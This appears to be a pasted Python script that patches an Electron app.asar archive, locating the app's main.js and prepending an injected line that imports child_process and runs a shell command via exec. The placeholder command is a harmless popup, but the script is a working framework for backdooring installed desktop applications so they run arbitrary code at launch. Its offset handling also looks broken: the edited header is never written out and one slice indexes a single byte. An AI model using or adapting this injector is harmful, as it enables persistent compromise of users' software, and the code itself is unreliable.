Untitled

avatar
unknown
python
a year ago
2.5 kB
7
Indexable
import json, struct

inj_line = """const { exec } = await import('child_process');exec(`msg * ${"asdasdasd"}`);\n"""

def adjust_offsets(files_dict, delta_main_js, target_offset):
    for item in files_dict.values():
        if 'offset' in item:
            item_offset = int(item['offset'])
            if item_offset > target_offset:
                item['offset'] = str(item_offset + delta_main_js)
        if 'files' in item:
            adjust_offsets(item['files'], delta_main_js, target_offset)


with open("app.asar", "rb") as rb:
    data_size = struct.unpack('<I', rb.read(4))[0]
    header_size = struct.unpack('<I', rb.read(4))[0]
    header_object_size = struct.unpack('<I', rb.read(4))[0]
    header_string_size = struct.unpack('<I', rb.read(4))[0]
    json_header = json.loads(rb.read(header_string_size))

    with open("header.json", "w") as w:
        json.dump(json_header, w, indent=4)
    package_json_header = json_header["files"]["package.json"]
    # json_header['files']['app_bootstrap']['files']['index.js']
    # rb.seek(0)
    rb.seek(int(package_json_header["offset"]) + header_string_size + 18 )
    package_json = rb.read(package_json_header["size"])
    package_json = json.loads(package_json)

    mainjs_path = package_json['main'].split("/")

    full_mainjs_path = []
    for item in mainjs_path:
        full_mainjs_path.append("files")
        full_mainjs_path.append(item)

    target_item = json_header
    for key in full_mainjs_path:
        target_item = target_item[key]

    rb.seek(int(target_item["offset"]) + header_string_size + 18 )
    main_js_raw = rb.read(target_item["size"])
    # print(main_js)

    rb.seek(0)
    old_asar = rb.read()

    main_js_offset = int(int(target_item["offset"]) + header_string_size + 18)

    json_header_files = json_header['files']

    adjust_offsets(json_header_files, len(inj_line), main_js_offset)

    


    # package old
    # 3177
    # 187684716

    # package new
    # 3177
    # 187684793


    # mainjs old
    # 47376
    # 69035644

    # mainjs new
    # 47453
    # 69035644

    new_asar = old_asar[0:main_js_offset]

    main_js = inj_line.encode("utf-8") + main_js_raw
    main_js_len = int(len(main_js))

    json_header_files['main.js']["size"] = main_js_len

    new_asar = new_asar + main_js + old_asar[main_js_offset + main_js_len]

    with open("new.asar", "wb") as wb:
        wb.write(new_asar)

    # with open("main.js", "wb") as wb:
    #     wb.write(main_js)
Editor is loading...
Leave a Comment